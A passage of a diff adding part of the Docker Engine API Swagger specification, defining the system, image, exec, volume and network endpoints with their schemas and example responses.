+            $ref: "#/definitions/ErrorResponse"
+      tags: ["Image"]
+  /auth:
+    post:
+      summary: "Check auth configuration"
+      description: "Validate credentials for a registry and, if available, get an identity token for accessing the registry without password."
+      operationId: "SystemAuth"
+      consumes: ["application/json"]
+      produces: ["application/json"]
+      responses:
+        200:
+          description: "An identity token was generated successfully."
+          schema:
+            type: "object"
+            required: [Status]
+            properties:
+              Status:
+                description: "The status of the authentication"
+                type: "string"
+                x-nullable: false
+              IdentityToken:
+                description: "An opaque token used to authenticate a user after a successful login"
+                type: "string"
+                x-nullable: false
+          examples:
+            application/json:
+              Status: "Login Succeeded"
+              IdentityToken: "9cbaf023786cd7..."
+        204:
+          description: "No error"
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "authConfig"
+          in: "body"
+          description: "Authentication to check"
+          schema:
+            $ref: "#/definitions/AuthConfig"
+      tags: ["System"]
+  /info:
+    get:
+      summary: "Get system information"
+      operationId: "SystemInfo"
+      produces:
+        - "application/json"
+      responses:
+        200:
+          description: "No error"
+          schema:
+            type: "object"
+            properties:
+              Architecture:
+                type: "string"
+              Containers:
+                type: "integer"
+              ContainersRunning:
+                type: "integer"
+              ContainersStopped:
+                type: "integer"
+              ContainersPaused:
+                type: "integer"
+              CpuCfsPeriod:
+                type: "boolean"
+              CpuCfsQuota:
+                type: "boolean"
+              Debug:
+                type: "boolean"
+              DiscoveryBackend:
+                type: "string"
+              DockerRootDir:
+                type: "string"
+              Driver:
+                type: "string"
+              DriverStatus:
+                type: "array"
+                items:
+                  type: "array"
+                  items:
+                    type: "string"
+              SystemStatus:
+                type: "array"
+                items:
+                  type: "array"
+                  items:
+                    type: "string"
+              Plugins:
+                type: "object"
+                properties:
+                  Volume:
+                    type: "array"
+                    items:
+                      type: "string"
+                  Network:
+                    type: "array"
+                    items:
+                      type: "string"
+              ExperimentalBuild:
+                type: "boolean"
+              HttpProxy:
+                type: "string"
+              HttpsProxy:
+                type: "string"
+              ID:
+                type: "string"
+              IPv4Forwarding:
+                type: "boolean"
+              Images:
+                type: "integer"
+              IndexServerAddress:
+                type: "string"
+              InitPath:
+                type: "string"
+              InitSha1:
+                type: "string"
+              KernelVersion:
+                type: "string"
+              Labels:
+                type: "array"
+                items:
+                  type: "string"
+              MemTotal:
+                type: "integer"
+              MemoryLimit:
+                type: "boolean"
+              NCPU:
+                type: "integer"
+              NEventsListener:
+                type: "integer"
+              NFd:
+                type: "integer"
+              NGoroutines:
+                type: "integer"
+              Name:
+                type: "string"
+              NoProxy:
+                type: "string"
+              OomKillDisable:
+                type: "boolean"
+              OSType:
+                type: "string"
+              OomScoreAdj:
+                type: "integer"
+              OperatingSystem:
+                type: "string"
+              RegistryConfig:
+                type: "object"
+                properties:
+                  IndexConfigs:
+                    type: "object"
+                    additionalProperties:
+                      type: "object"
+                      properties:
+                        Mirrors:
+                          type: "array"
+                          items:
+                            type: "string"
+                        Name:
+                          type: "string"
+                        Official:
+                          type: "boolean"
+                        Secure:
+                          type: "boolean"
+                  InsecureRegistryCIDRs:
+                    type: "array"
+                    items:
+                      type: "string"
+              SwapLimit:
+                type: "boolean"
+              SystemTime:
+                type: "string"
+              ServerVersion:
+                type: "string"
+          examples:
+            application/json:
+              Architecture: "x86_64"
+              ClusterStore: "etcd://localhost:2379"
+              CgroupDriver: "cgroupfs"
+              Containers: 11
+              ContainersRunning: 7
+              ContainersStopped: 3
+              ContainersPaused: 1
+              CpuCfsPeriod: true
+              CpuCfsQuota: true
+              Debug: false
+              DockerRootDir: "/var/lib/docker"
+              Driver: "btrfs"
+              DriverStatus:
+                -
+                  - ""
+              ExperimentalBuild: false
+              HttpProxy: "http://test:test@localhost:8080"
+              HttpsProxy: "https://test:test@localhost:8080"
+              ID: "7TRN:IPZB:QYBB:VPBQ:UMPP:KARE:6ZNR:XE6T:7EWV:PKF4:ZOJD:TPYS"
+              IPv4Forwarding: true
+              Images: 16
+              IndexServerAddress: "https://index.docker.io/v1/"
+              InitPath: "/usr/bin/docker"
+              InitSha1: ""
+              KernelMemory: true
+              KernelVersion: "3.12.0-1-amd64"
+              Labels:
+                - "storage=ssd"
+              MemTotal: 2099236864
+              MemoryLimit: true
+              NCPU: 1
+              NEventsListener: 0
+              NFd: 11
+              NGoroutines: 21
+              Name: "prod-server-42"
+              NoProxy: "9.81.1.160"
+              OomKillDisable: true
+              OSType: "linux"
+              OperatingSystem: "Boot2Docker"
+              Plugins:
+                Volume:
+                  - "local"
+                Network:
+                  - "null"
+                  - "host"
+                  - "bridge"
+              RegistryConfig:
+                IndexConfigs:
+                  docker.io:
+                    Name: "docker.io"
+                    Official: true
+                    Secure: true
+                InsecureRegistryCIDRs:
+                  - "127.0.0.0/8"
+              SecurityOptions:
+                - Key: "Name"
+                  Value: "seccomp"
+                - Key: "Profile"
+                  Value: "default"
+                - Key: "Name"
+                  Value: "apparmor"
+                - Key: "Name"
+                  Value: "selinux"
+                - Key: "Name"
+                  Value: "userns"
+              ServerVersion: "1.9.0"
+              SwapLimit: false
+              SystemStatus:
+                -
+                  - "State"
+                  - "Healthy"
+              SystemTime: "2015-03-10T11:11:23.730591467-07:00"
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      tags: ["System"]
+  /version:
+    get:
+      summary: "Get version"
+      description: "Returns the version of Docker that is running and various information about the system that Docker is running on."
+      operationId: "SystemVersion"
+      produces:
+        - "application/json"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            type: "object"
+            properties:
+              Version:
+                type: "string"
+              ApiVersion:
+                type: "string"
+              MinAPIVersion:
+                type: "string"
+              GitCommit:
+                type: "string"
+              GoVersion:
+                type: "string"
+              Os:
+                type: "string"
+              Arch:
+                type: "string"
+              KernelVersion:
+                type: "string"
+              Experimental:
+                type: "boolean"
+              BuildTime:
+                type: "string"
+          examples:
+            application/json:
+              Version: "1.13.0"
+              Os: "linux"
+              KernelVersion: "3.19.0-23-generic"
+              GoVersion: "go1.6.3"
+              GitCommit: "deadbee"
+              Arch: "amd64"
+              ApiVersion: "1.25"
+              MinAPIVersion: "1.12"
+              BuildTime: "2016-06-14T07:09:13.444803460+00:00"
+              Experimental: true
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      tags: ["System"]
+  /_ping:
+    get:
+      summary: "Ping"
+      description: "This is a dummy endpoint you can use to test if the server is accessible."
+      operationId: "SystemPing"
+      produces:
+        - "text/plain"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            type: "string"
+            example: "OK"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      tags: ["System"]
+  /commit:
+    post:
+      summary: "Create a new image from a container"
+      operationId: "ImageCommit"
+      consumes:
+        - "application/json"
+      produces:
+        - "application/json"
+      responses:
+        201:
+          description: "no error"
+          schema:
+            $ref: "#/definitions/IdResponse"
+        404:
+          description: "no such container"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such container: c2ada9df5af8"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "containerConfig"
+          in: "body"
+          description: "The container configuration"
+          schema:
+            $ref: "#/definitions/Config"
+        - name: "container"
+          in: "query"
+          description: "The ID or name of the container to commit"
+          type: "string"
+        - name: "repo"
+          in: "query"
+          description: "Repository name for the created image"
+          type: "string"
+        - name: "tag"
+          in: "query"
+          description: "Tag name for the create image"
+          type: "string"
+        - name: "comment"
+          in: "query"
+          description: "Commit message"
+          type: "string"
+        - name: "author"
+          in: "query"
+          description: "Author of the image (e.g., `John Hannibal Smith <hannibal@a-team.com>`)"
+          type: "string"
+        - name: "pause"
+          in: "query"
+          description: "Whether to pause the container before committing"
+          type: "boolean"
+          default: true
+        - name: "changes"
+          in: "query"
+          description: "`Dockerfile` instructions to apply while committing"
+          type: "string"
+      tags: ["Image"]
+  /events:
+    get:
+      summary: "Monitor events"
+      description: |
+        Stream real-time events from the server.
+
+        Various objects within Docker report events when something happens to them.
+
+        Containers report these events: `attach, commit, copy, create, destroy, detach, die, exec_create, exec_detach, exec_start, export, kill, oom, pause, rename, resize, restart, start, stop, top, unpause, update`
+
+        Images report these events: `delete, import, load, pull, push, save, tag, untag`
+
+        Volumes report these events: `create, mount, unmount, destroy`
+
+        Networks report these events: `create, connect, disconnect, destroy`
+
+        The Docker daemon reports these events: `reload`
+
+      operationId: "SystemEvents"
+      produces:
+        - "application/json"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            type: "object"
+            properties:
+              Type:
+                description: "The type of object emitting the event"
+                type: "string"
+              Action:
+                description: "The type of event"
+                type: "string"
+              Actor:
+                type: "object"
+                properties:
+                  ID:
+                    description: "The ID of the object emitting the event"
+                    type: "string"
+                  Attributes:
+                    description: "Various key/value attributes of the object, depending on its type"
+                    type: "object"
+                    additionalProperties:
+                      type: "string"
+              time:
+                description: "Timestamp of event"
+                type: "integer"
+              timeNano:
+                description: "Timestamp of event, with nanosecond accuracy"
+                type: "integer"
+                format: "int64"
+          examples:
+            application/json:
+              Type: "container"
+              Action: "create"
+              Actor:
+                ID: "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743"
+                Attributes:
+                  com.example.some-label: "some-label-value"
+                  image: "alpine"
+                  name: "my-container"
+              time: 1461943101
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "since"
+          in: "query"
+          description: "Show events created since this timestamp then stream new events."
+          type: "string"
+        - name: "until"
+          in: "query"
+          description: "Show events created until this timestamp then stop streaming."
+          type: "string"
+        - name: "filters"
+          in: "query"
+          description: |
+            A JSON encoded value of filters (a `map[string][]string`) to process on the event list. Available filters:
+
+            - `container=<string>` container name or ID
+            - `event=<string>` event type
+            - `image=<string>` image name or ID
+            - `label=<string>` image or container label
+            - `type=<string>` object to filter by, one of `container`, `image`, `volume`, `network`, or `daemon`
+            - `volume=<string>` volume name or ID
+            - `network=<string>` network name or ID
+            - `daemon=<string>` daemon name or ID
+          type: "string"
+      tags: ["System"]
+  /system/df:
+    get:
+      summary: "Get data usage information"
+      operationId: "SystemDataUsage"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            type: "object"
+            properties:
+              LayersSize:
+                type: "integer"
+                format: "int64"
+              Images:
+                type: "array"
+                items:
+                  $ref: "#/definitions/ImageSummary"
+              Containers:
+                type: "array"
+                items:
+                  $ref: "#/definitions/ContainerSummary"
+              Volumes:
+                type: "array"
+                items:
+                  $ref: "#/definitions/Volume"
+            example:
+              LayersSize: 1092588
+              Images:
+                -
+                  Id: "sha256:2b8fd9751c4c0f5dd266fcae00707e67a2545ef34f9a29354585f93dac906749"
+                  ParentId: ""
+                  RepoTags:
+                    - "busybox:latest"
+                  RepoDigests:
+                    - "busybox@sha256:a59906e33509d14c036c8678d687bd4eec81ed7c4b8ce907b888c607f6a1e0e6"
+                  Created: 1466724217
+                  Size: 1092588
+                  SharedSize: 0
+                  VirtualSize: 1092588
+                  Labels: {}
+                  Containers: 1
+              Containers:
+                -
+                  Id: "e575172ed11dc01bfce087fb27bee502db149e1a0fad7c296ad300bbff178148"
+                  Names:
+                    - "/top"
+                  Image: "busybox"
+                  ImageID: "sha256:2b8fd9751c4c0f5dd266fcae00707e67a2545ef34f9a29354585f93dac906749"
+                  Command: "top"
+                  Created: 1472592424
+                  Ports: []
+                  SizeRootFs: 1092588
+                  Labels: {}
+                  State: "exited"
+                  Status: "Exited (0) 56 minutes ago"
+                  HostConfig:
+                    NetworkMode: "default"
+                  NetworkSettings:
+                    Networks:
+                      bridge:
+                        IPAMConfig: null
+                        Links: null
+                        Aliases: null
+                        NetworkID: "d687bc59335f0e5c9ee8193e5612e8aee000c8c62ea170cfb99c098f95899d92"
+                        EndpointID: "8ed5115aeaad9abb174f68dcf135b49f11daf597678315231a32ca28441dec6a"
+                        Gateway: "172.18.0.1"
+                        IPAddress: "172.18.0.2"
+                        IPPrefixLen: 16
+                        IPv6Gateway: ""
+                        GlobalIPv6Address: ""
+                        GlobalIPv6PrefixLen: 0
+                        MacAddress: "02:42:ac:12:00:02"
+                  Mounts: []
+              Volumes:
+                -
+                  Name: "my-volume"
+                  Driver: "local"
+                  Mountpoint: ""
+                  Labels: null
+                  Scope: ""
+                  Options: null
+                  UsageData:
+                    Size: 0
+                    RefCount: 0
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      tags: ["System"]
+  /images/{name}/get:
+    get:
+      summary: "Export an image"
+      description: |
+        Get a tarball containing all images and metadata for a repository.
+
+        If `name` is a specific name and tag (e.g. `ubuntu:latest`), then only that image (and its parents) are returned. If `name` is an image ID, similarly only that image (and its parents) are returned, but with the exclusion of the `repositories` file in the tarball, as there were no image names referenced.
+
+        ### Image tarball format
+
+        An image tarball contains one directory per image layer (named using its long ID), each containing these files:
+
+        - `VERSION`: currently `1.0` - the file format version
+        - `json`: detailed layer information, similar to `docker inspect layer_id`
+        - `layer.tar`: A tarfile containing the filesystem changes in this layer
+
+        The `layer.tar` file contains `aufs` style `.wh..wh.aufs` files and directories for storing attribute changes and deletions.
+
+        If the tarball defines a repository, the tarball should also include a `repositories` file at the root that contains a list of repository and tag names mapped to layer IDs.
+
+        ```json
+        {
+          "hello-world": {
+            "latest": "565a9d68a73f6706862bfe8409a7f659776d4d60a8d096eb4a3cbce6999cc2a1"
+          }
+        }
+        ```
+      operationId: "ImageGet"
+      produces:
+        - "application/x-tar"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            type: "string"
+            format: "binary"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "name"
+          in: "path"
+          description: "Image name or ID"
+          type: "string"
+          required: true
+      tags: ["Image"]
+  /images/get:
+    get:
+      summary: "Export several images"
+      description: |
+        Get a tarball containing all images and metadata for several image repositories.
+
+        For each value of the `names` parameter: if it is a specific name and tag (e.g. `ubuntu:latest`), then only that image (and its parents) are returned; if it is an image ID, similarly only that image (and its parents) are returned and there would be no names referenced in the 'repositories' file for this image ID.
+
+        For details on the format, see [the export image endpoint](#operation/ImageGet).
+      operationId: "ImageGetAll"
+      produces:
+        - "application/x-tar"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            type: "string"
+            format: "binary"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "names"
+          in: "query"
+          description: "Image names to filter by"
+          type: "array"
+          items:
+            type: "string"
+      tags: ["Image"]
+  /images/load:
+    post:
+      summary: "Import images"
+      description: |
+        Load a set of images and tags into a repository.
+
+        For details on the format, see [the export image endpoint](#operation/ImageGet).
+      operationId: "ImageLoad"
+      consumes:
+        - "application/x-tar"
+      produces:
+        - "application/json"
+      responses:
+        200:
+          description: "no error"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "imagesTarball"
+          in: "body"
+          description: "Tar archive containing images"
+          schema:
+            type: "string"
+            format: "binary"
+        - name: "quiet"
+          in: "query"
+          description: "Suppress progress details during load."
+          type: "boolean"
+          default: false
+      tags: ["Image"]
+  /containers/{id}/exec:
+    post:
+      summary: "Create an exec instance"
+      description: "Run a command inside a running container."
+      operationId: "ContainerExec"
+      consumes:
+        - "application/json"
+      produces:
+        - "application/json"
+      responses:
+        201:
+          description: "no error"
+          schema:
+            $ref: "#/definitions/IdResponse"
+        404:
+          description: "no such container"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such container: c2ada9df5af8"
+        409:
+          description: "container is paused"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "execConfig"
+          in: "body"
+          description: "Exec configuration"
+          schema:
+            type: "object"
+            properties:
+              AttachStdin:
+                type: "boolean"
+                description: "Attach to `stdin` of the exec command."
+              AttachStdout:
+                type: "boolean"
+                description: "Attach to `stdout` of the exec command."
+              AttachStderr:
+                type: "boolean"
+                description: "Attach to `stderr` of the exec command."
+              DetachKeys:
+                type: "string"
+                description: "Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-<value>` where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`."
+              Tty:
+                type: "boolean"
+                description: "Allocate a pseudo-TTY."
+              Env:
+                description: "A list of environment variables in the form `[\"VAR=value\", ...]`."
+                type: "array"
+                items:
+                  type: "string"
+              Cmd:
+                type: "array"
+                description: "Command to run, as a string or array of strings."
+                items:
+                  type: "string"
+              Privileged:
+                type: "boolean"
+                description: "Runs the exec process with extended privileges."
+                default: false
+              User:
+                type: "string"
+                description: "The user, and optionally, group to run the exec process inside the container. Format is one of: `user`, `user:group`, `uid`, or `uid:gid`."
+            example:
+              AttachStdin: false
+              AttachStdout: true
+              AttachStderr: true
+              DetachKeys: "ctrl-p,ctrl-q"
+              Tty: false
+              Cmd:
+                - "date"
+              Env:
+                - "FOO=bar"
+                - "BAZ=quux"
+          required: true
+        - name: "id"
+          in: "path"
+          description: "ID or name of container"
+          type: "string"
+          required: true
+      tags: ["Exec"]
+  /exec/{id}/start:
+    post:
+      summary: "Start an exec instance"
+      description: "Starts a previously set up exec instance. If detach is true, this endpoint returns immediately after starting the command. Otherwise, it sets up an interactive session with the command."
+      operationId: "ExecStart"
+      consumes:
+        - "application/json"
+      produces:
+        - "application/vnd.docker.raw-stream"
+      responses:
+        200:
+          description: "No error"
+        404:
+          description: "No such exec instance"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        409:
+          description: "Container is stopped or paused"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "execStartConfig"
+          in: "body"
+          schema:
+            type: "object"
+            properties:
+              Detach:
+                type: "boolean"
+                description: "Detach from the command."
+              Tty:
+                type: "boolean"
+                description: "Allocate a pseudo-TTY."
+            example:
+              Detach: false
+              Tty: false
+        - name: "id"
+          in: "path"
+          description: "Exec instance ID"
+          required: true
+          type: "string"
+      tags: ["Exec"]
+  /exec/{id}/resize:
+    post:
+      summary: "Resize an exec instance"
+      description: "Resize the TTY session used by an exec instance. This endpoint only works if `tty` was specified as part of creating and starting the exec instance."
+      operationId: "ExecResize"
+      responses:
+        201:
+          description: "No error"
+        404:
+          description: "No such exec instance"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          description: "Exec instance ID"
+          required: true
+          type: "string"
+        - name: "h"
+          in: "query"
+          description: "Height of the TTY session in characters"
+          type: "integer"
+        - name: "w"
+          in: "query"
+          description: "Width of the TTY session in characters"
+          type: "integer"
+      tags: ["Exec"]
+  /exec/{id}/json:
+    get:
+      summary: "Inspect an exec instance"
+      description: "Return low-level information about an exec instance."
+      operationId: "ExecInspect"
+      produces:
+        - "application/json"
+      responses:
+        200:
+          description: "No error"
+          schema:
+            type: "object"
+            properties:
+              ID:
+                type: "string"
+              Running:
+                type: "boolean"
+              ExitCode:
+                type: "integer"
+              ProcessConfig:
+                $ref: "#/definitions/ProcessConfig"
+              OpenStdin:
+                type: "boolean"
+              OpenStderr:
+                type: "boolean"
+              OpenStdout:
+                type: "boolean"
+              ContainerID:
+                type: "string"
+              Pid:
+                type: "integer"
+                description: "The system process ID for the exec process."
+          examples:
+            application/json:
+              CanRemove: false
+              ContainerID: "b53ee82b53a40c7dca428523e34f741f3abc51d9f297a14ff874bf761b995126"
+              DetachKeys: ""
+              ExitCode: 2
+              ID: "f33bbfb39f5b142420f4759b2348913bd4a8d1a6d7fd56499cb41a1bb91d7b3b"
+              OpenStderr: true
+              OpenStdin: true
+              OpenStdout: true
+              ProcessConfig:
+                arguments:
+                  - "-c"
+                  - "exit 2"
+                entrypoint: "sh"
+                privileged: false
+                tty: true
+                user: "1000"
+              Running: false
+              Pid: 42000
+        404:
+          description: "No such exec instance"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          description: "Exec instance ID"
+          required: true
+          type: "string"
+      tags: ["Exec"]
+
+  /volumes:
+    get:
+      summary: "List volumes"
+      operationId: "VolumeList"
+      produces: ["application/json"]
+      responses:
+        200:
+          description: "Summary volume data that matches the query"
+          schema:
+            type: "object"
+            required: [Volumes, Warnings]
+            properties:
+              Volumes:
+                type: "array"
+                x-nullable: false
+                description: "List of volumes"
+                items:
+                  $ref: "#/definitions/Volume"
+              Warnings:
+                type: "array"
+                x-nullable: false
+                description: "Warnings that occurred when fetching the list of volumes"
+                items:
+                  type: "string"
+
+          examples:
+            application/json:
+              Volumes:
+                - Name: "tardis"
+                  Driver: "local"
+                  Mountpoint: "/var/lib/docker/volumes/tardis"
+                  Labels:
+                    com.example.some-label: "some-value"
+                    com.example.some-other-label: "some-other-value"
+                  Scope: "local"
+                  Options:
+                    device: "tmpfs"
+                    o: "size=100m,uid=1000"
+                    type: "tmpfs"
+              Warnings: []
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "filters"
+          in: "query"
+          description: |
+            JSON encoded value of the filters (a `map[string][]string`) to
+            process on the volumes list. Available filters:
+
+            - `name=<volume-name>` Matches all or part of a volume name.
+            - `dangling=<boolean>` When set to `true` (or `1`), returns all
+               volumes that are not in use by a container. When set to `false`
+               (or `0`), only volumes that are in use by one or more
+               containers are returned.
+            - `driver=<volume-driver-name>` Matches all or part of a volume
+              driver name.
+          type: "string"
+          format: "json"
+      tags: ["Volume"]
+
+  /volumes/create:
+    post:
+      summary: "Create a volume"
+      operationId: "VolumeCreate"
+      consumes: ["application/json"]
+      produces: ["application/json"]
+      responses:
+        201:
+          description: "The volume was created successfully"
+          schema:
+            $ref: "#/definitions/Volume"
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "volumeConfig"
+          in: "body"
+          required: true
+          description: "Volume configuration"
+          schema:
+            type: "object"
+            properties:
+              Name:
+                description: "The new volume's name. If not specified, Docker generates a name."
+                type: "string"
+                x-nullable: false
+              Driver:
+                description: "Name of the volume driver to use."
+                type: "string"
+                default: "local"
+                x-nullable: false
+              DriverOpts:
+                description: "A mapping of driver options and values. These options are passed directly to the driver and are driver specific."
+                type: "object"
+                additionalProperties:
+                  type: "string"
+              Labels:
+                description: "User-defined key/value metadata."
+                type: "object"
+                additionalProperties:
+                  type: "string"
+            example:
+              Name: "tardis"
+              Labels:
+                com.example.some-label: "some-value"
+                com.example.some-other-label: "some-other-value"
+              Driver: "custom"
+      tags: ["Volume"]
+
+  /volumes/{name}:
+    get:
+      summary: "Inspect a volume"
+      operationId: "VolumeInspect"
+      produces: ["application/json"]
+      responses:
+        200:
+          description: "No error"
+          schema:
+            $ref: "#/definitions/Volume"
+        404:
+          description: "No such volume"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "name"
+          in: "path"
+          required: true
+          description: "Volume name or ID"
+          type: "string"
+      tags: ["Volume"]
+
+    delete:
+      summary: "Remove a volume"
+      description: "Instruct the driver to remove the volume."
+      operationId: "VolumeDelete"
+      responses:
+        204:
+          description: "The volume was removed"
+        404:
+          description: "No such volume or volume driver"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        409:
+          description: "Volume is in use and cannot be removed"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "name"
+          in: "path"
+          required: true
+          description: "Volume name or ID"
+          type: "string"
+        - name: "force"
+          in: "query"
+          description: "Force the removal of the volume"
+          type: "boolean"
+          default: false
+      tags: ["Volume"]
+  /volumes/prune:
+    post:
+      summary: "Delete unused volumes"
+      produces:
+        - "application/json"
+      operationId: "VolumePrune"
+      parameters:
+        - name: "filters"
+          in: "query"
+          description: |
+            Filters to process on the prune list, encoded as JSON (a `map[string][]string`).
+
+            Available filters:
+          type: "string"
+      responses:
+        200:
+          description: "No error"
+          schema:
+            type: "object"
+            properties:
+              VolumesDeleted:
+                description: "Volumes that were deleted"
+                type: "array"
+                items:
+                  type: "string"
+              SpaceReclaimed:
+                description: "Disk space reclaimed in bytes"
+                type: "integer"
+                format: "int64"
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      tags: ["Volume"]
+  /networks:
+    get:
+      summary: "List networks"
+      operationId: "NetworkList"
+      produces:
+        - "application/json"
+      responses:
+        200:
+          description: "No error"
+          schema:
+            type: "array"
+            items:
+              $ref: "#/definitions/Network"
+          examples:
+            application/json:
+              - Name: "bridge"
+                Id: "f2de39df4171b0dc801e8002d1d999b77256983dfc63041c0f34030aa3977566"
+                Created: "2016-10-19T06:21:00.416543526Z"
+                Scope: "local"
+                Driver: "bridge"
+                EnableIPv6: false
+                Internal: false
+                IPAM:
+                  Driver: "default"
+                  Config:
+                    -
+                      Subnet: "172.17.0.0/16"
+                Containers:
+                  39b69226f9d79f5634485fb236a23b2fe4e96a0a94128390a7fbbcc167065867:
+                    EndpointID: "ed2419a97c1d9954d05b46e462e7002ea552f216e9b136b80a7db8d98b442eda"
+                    MacAddress: "02:42:ac:11:00:02"
+                    IPv4Address: "172.17.0.2/16"
+                    IPv6Address: ""
+                Options:
+                  com.docker.network.bridge.default_bridge: "true"
+                  com.docker.network.bridge.enable_icc: "true"
+                  com.docker.network.bridge.enable_ip_masquerade: "true"
+                  com.docker.network.bridge.host_binding_ipv4: "0.0.0.0"
+                  com.docker.network.bridge.name: "docker0"
+                  com.docker.network.driver.mtu: "1500"
+              - Name: "none"
+                Id: "e086a3893b05ab69242d3c44e49483a3bbbd3a26b46baa8f61ab797c1088d794"
+                Created: "0001-01-01T00:00:00Z"
+                Scope: "local"
+                Driver: "null"
+                EnableIPv6: false
+                Internal: false
+                IPAM:
+                  Driver: "default"
+                  Config: []
+                Containers: {}
+                Options: {}
+              - Name: "host"
+                Id: "13e871235c677f196c4e1ecebb9dc733b9b2d2ab589e30c539efeda84a24215e"
+                Created: "0001-01-01T00:00:00Z"
+                Scope: "local"
+                Driver: "host"
+                EnableIPv6: false
+                Internal: false
+                IPAM:
+                  Driver: "default"
+                  Config: []
+                Containers: {}
+                Options: {}
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "filters"
+          in: "query"
+          description: |
+            JSON encoded value of the filters (a `map[string][]string`) to process on the networks list. Available filters:
+
+            - `driver=<driver-name>` Matches a network's driver.
+            - `id=<network-id>` Matches all or part of a network ID.
+            - `label=<key>` or `label=<key>=<value>` of a network label.
+            - `name=<network-name>` Matches all or part of a network name.
+            - `type=["custom"|"builtin"]` Filters networks by type. The `custom` keyword returns all user-defined networks.
+          type: "string"
+      tags: ["Network"]
+
+  /networks/{id}:
+    get:
+      summary: "Inspect a network"
+      operationId: "NetworkInspect"
+      produces:
+        - "application/json"
+      responses:
+        200:
+          description: "No error"
+          schema:
+            $ref: "#/definitions/Network"
+        404:
+          description: "Network not found"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          description: "Network ID or name"
+          required: true
+          type: "string"
+      tags: ["Network"]
+
+    delete:
+      summary: "Remove a network"
+      operationId: "NetworkDelete"
+      responses:
+        204:
+          description: "No error"
+        404:
+          description: "no such network"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          description: "Network ID or name"
+          required: true
+          type: "string"
+      tags: ["Network"]
+
+  /networks/create:
+    post:
+      summary: "Create a network"
+      operationId: "NetworkCreate"
+      consumes:
+        - "application/json"
+      produces:
+        - "application/json"
+      responses:
+        201:
+          description: "No error"
+          schema:
+            type: "object"
+            properties:
+              Id:
+                description: "The ID of the created network."
+                type: "string"
+              Warning:
+                type: "string"
+            example:
+              Id: "22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30"
+              Warning: ""
+        403:
+          description: "operation not supported for pre-defined networks"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        404:
+          description: "plugin not found"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "networkConfig"
+          in: "body"
+          description: "Network configuration"
+          required: true
+          schema:
+            type: "object"
+            required: ["Name"]
+            properties:
+              Name:
+                description: "The network's name."
+                type: "string"
+              CheckDuplicate:
+                description: "Check for networks with duplicate names."
+                type: "boolean"
+              Driver:
+                description: "Name of the network driver plugin to use."
+                type: "string"
+                default: "bridge"
+              Internal:
+                description: "Restrict external access to the network."
+                type: "boolean"
+              IPAM:
+                description: "Optional custom IP scheme for the network."
+                $ref: "#/definitions/IPAM"
+              EnableIPv6:
+                description: "Enable IPv6 on the network."
+                type: "boolean"
+              Options:
+                description: "Network specific options to be used by the drivers."
+                type: "object"
+                additionalProperties:
+                  type: "string"
+              Labels:
+                description: "User-defined key/value metadata."
+                type: "object"
+                additionalProperties:
+                  type: "string"
+            example:
+              Name: "isolated_nw"
+              CheckDuplicate: false
+              Driver: "bridge"
+              EnableIPv6: true
+              IPAM:
+                Driver: "default"
+                Config:
+                  - Subnet: "172.20.0.0/16"
+                    IPRange: "172.20.10.0/24"
